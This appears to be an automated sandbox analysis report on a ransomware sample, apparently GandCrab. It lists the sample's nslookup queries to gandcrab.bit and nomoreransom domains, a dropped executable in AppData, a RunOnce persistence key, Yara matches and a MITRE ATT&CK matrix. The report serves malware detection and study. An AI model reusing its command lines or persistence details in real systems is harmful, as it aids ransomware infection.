                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: gI5xZdIxUs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

                        Data Obfuscation

                        barindex
                        Yara detected ReflectiveLoader
                        Source: Yara matchFile source: gI5xZdIxUs.exe, type: SAMPLE
                        Source: Yara matchFile source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000014.00000000.322631215.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.272296797.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000000.307645700.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: gI5xZdIxUs.exe PID: 5280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: isqmkp.exe PID: 5464, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: isqmkp.exe PID: 1572, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED
                        Source: gI5xZdIxUs.exeStatic PE information: section name: .l2
                        Source: isqmkp.exe.1.drStatic PE information: section name: .l2
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC682A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_0FC682A0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeJump to dropped file
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptlJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptlJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptlJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptlJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe TID: 5052Thread sleep count: 39 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe TID: 5052Thread sleep time: -39000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeEvaded block: after key decisiongraph_14-1997
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeEvaded block: after key decisiongraph_20-1997
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,1_2_0FC62F50
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,14_2_0F9D2F50
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,20_2_0F9D2F50
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC66C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,1_2_0FC66C90
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC66A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,1_2_0FC66A40
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,14_2_0F9D6C90
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,14_2_0F9D6A40
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,20_2_0F9D6C90
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,20_2_0F9D6A40
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeAPI call chain: ExitProcess graph end nodegraph_1-1906
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeAPI call chain: ExitProcess graph end nodegraph_1-1708
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeAPI call chain: ExitProcess graph end nodegraph_1-1717
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeAPI call chain: ExitProcess graph end nodegraph_1-1695
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeAPI call chain: ExitProcess graph end nodegraph_1-1839
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeAPI call chain: ExitProcess graph end nodegraph_1-2153
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeAPI call chain: ExitProcess graph end nodegraph_14-1905
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeAPI call chain: ExitProcess graph end nodegraph_20-1905
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC682A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_0FC682A0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC633E0 lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpyA,ExitProcess,1_2_0FC633E0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC65EC0 mov eax, dword ptr fs:[00000030h]1_2_0FC65EC0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D5EC0 mov eax, dword ptr fs:[00000030h]14_2_0F9D5EC0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D5EC0 mov eax, dword ptr fs:[00000030h]20_2_0F9D5EC0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC63AA0 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,1_2_0FC63AA0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC690A0 cpuid 1_2_0FC690A0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC67330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,1_2_0FC67330

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        1
                        Replication Through Removable Media                        		2
                        Native API                        		1
                        Registry Run Keys / Startup Folder                        		11
                        Process Injection                        		1
                        Software Packing                        		1
                        Input Capture                        		11
                        Peripheral Device Discovery                        		1
                        Replication Through Removable Media                        		11
                        Archive Collected Data                        		Exfiltration Over Other Network Medium1
                        Ingress Tool Transfer                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                        Data Encrypted for Impact
                        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        Registry Run Keys / Startup Folder                        		1
                        Masquerading                        		LSASS Memory1
                        Account Discovery                        		Remote Desktop Protocol1
                        Input Capture                        		Exfiltration Over Bluetooth2
                        Encrypted Channel                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                        Virtualization/Sandbox Evasion                        		Security Account Manager1
                        System Network Connections Discovery                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                        Non-Application Layer Protocol                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                        Process Injection                        		NTDS1
                        File and Directory Discovery                        		Distributed Component Object ModelInput CaptureScheduled Transfer1
                        Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets44
                        System Information Discovery                        		SSHKeyloggingData Transfer Size Limits1
                        Proxy                        		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials11
                        Security Software Discovery                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        Process Discovery                        		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                        Remote System Discovery                        		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture2
                        System Network Configuration Discovery                        		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 694566 Sample: gI5xZdIxUs.exe Startdate: 31/08/2022 Architecture: WINDOWS Score: 100 57 nomoreransom.coin 2->57 59 nomoreransom.bit 2->59 61 4 other IPs or domains 2->61 65 Snort IDS alert for network traffic 2->65 67 Multi AV Scanner detection for domain / URL 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 6 other signatures 2->71 8 gI5xZdIxUs.exe 1 28 2->8         started        13 isqmkp.exe 2->13         started        15 isqmkp.exe 2->15         started        signatures3 process4 dnsIp5 63 ipv4bot.whatismyipaddress.com 8->63 40 C:\Users\user\AppData\Roaming\...\isqmkp.exe, PE32 8->40 dropped 73 Contains functionality to determine the online IP of the system 8->73 75 May check the online IP address of the machine 8->75 77 Uses nslookup.exe to query domains 8->77 79 Performs many domain queries via nslookup 8->79 17 nslookup.exe 1 8->17         started        20 nslookup.exe 1 8->20         started        22 nslookup.exe 1 8->22         started        24 18 other processes 8->24 81 Antivirus detection for dropped file 13->81 83 Machine Learning detection for dropped file 13->83 file6 signatures7 process8 dnsIp9 42 dns1.soprodns.ru 17->42 45 nomoreransom.coin 17->45 47 8.8.8.8.in-addr.arpa 17->47 26 conhost.exe 17->26         started        51 3 other IPs or domains 20->51 28 conhost.exe 20->28         started        53 3 other IPs or domains 22->53 30 conhost.exe 22->30         started        49 nomoreransom.coin 24->49 55 53 other IPs or domains 24->55 32 conhost.exe 24->32         started        34 conhost.exe 24->34         started        36 conhost.exe 24->36         started        38 15 other processes 24->38 signatures10 85 May check the online IP address of the machine 42->85 process11

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
